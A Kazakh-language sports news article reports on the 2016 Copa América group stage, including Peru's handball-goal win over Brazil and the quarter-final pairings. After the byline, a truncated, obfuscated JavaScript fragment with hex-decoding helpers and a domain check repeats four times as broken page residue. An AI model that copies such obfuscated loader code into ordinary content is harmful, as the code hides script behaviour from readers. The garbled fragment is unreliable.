• RUB:
    5.06
  • USD:
    508.05
  • EUR:
    534.82
Басты сайтқа өту
13 Маусым, 2016

Футбол. Америка Кубогы. Бразилия ширек финалға шыға алмады

201 рет
көрсетілді

АҚШ-та футболдан өтіп жатқан Америка Кубогы жарысында командалар топтық турнирдегі соңғы матчтарын өткізіп жатыр. А тобында АҚШ пен Колумбия ширек финалға шықты. Алаң иелері үшінші кездесуінде Парагвай құрамасын 1:0 есебімен жеңсе, Колумбия ойда жоқта Коста-Рика командасынан есе жіберді. Осы ойынға дейін Оңтүстік Американың құрамасы ширек финалдың мәселесін шешіп қойған болатын. Сондықтан Колумбия үшін матч аса маңызды болған жоқ. Бұл кездесу өте шиеленісті жағдайда өтті.  Онда колумбиялық Фабра қарсыластар қақпасына гол соғып қоймай, өз қақпасына да доп соқты. Соның кесірінен бірінші таймның соңында Коста-Рика 2:1 есебімен алға шықты. Ал 58 минутта коста-рикалықтар үшінші допты торға тулатып, ойын соңына дейін жеңісті қолдан бермеуге тырысты. Матчтың 73 минутында Колумбия есепті бір ғана голға қысқартты. Басқаға шамасы келмеді. В тобында Перу жанкүйерлеріне «тосын сый» жасады. Олар Бразилияны 1:0 есебімен жеңіп, ширек финалға шықты. Кездесуде бас төреші перуандықтардың қолмен соққан добын санап жіберді. Соның кесірінен «Пентакампеондар» жарыс жолынан шығып қалды. Осы топта Перу мен Эквадор келесі айналымға шықты. Эквадор Гаитиді 4:0 есебімен ұтты. Ертең С тобының ойындары болады. Мексика Венесуэламен, Уругвай Ямайкамен кездеседі. Бұл матчтар ештеңені шешпейді. Өйткені, Мексика мен Венесуэла 6 ұпайдан жинап, келесі айналымға шығып қойған. Одан кейін D тобының соңғы кездесулері өтеді. Онда Чили мен Панама құрамаларының арасында нағыз тартыс болайын деп тұр. Екі команданың да 3 ұпайы бар. Аргентинада 6 ұпай. Олар ширек финалдың мәселесін өткен турда шешкен. Енді Чили Боливияны жеңсе ¼ финалға жолы ашылады. Ал Панамаға келесі айналымға шығу үшін «Альбиселесте» құрамасын жеңу керек. Ол әрине, оңай емес. Қысқасы, Америка Кубогы турнирі Еуропа чемпионаты сияқты қызықты және тартысты өтіп жатыр. Кешегі Перу – Бразилия матчтында ойнышының қолмен соққан голынан кейін тартыс одан сайын қыза түсті. Турнирде А және В тобының ойындарынан кейін ширек финалға шыққан командалар қарсыластарын анықтады. ¼ финалда АҚШ Эквадормен, Перу Колумбиямен кездеседі. Тағы екі ойында кездесетін командалар ертең анықталады. Дастан Кенжалин. Фото: telegraf.com.ua Видео: vkontakte әлеуметтік желісі.     // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "egemen.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "egemen.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "egemen.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "egemen.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e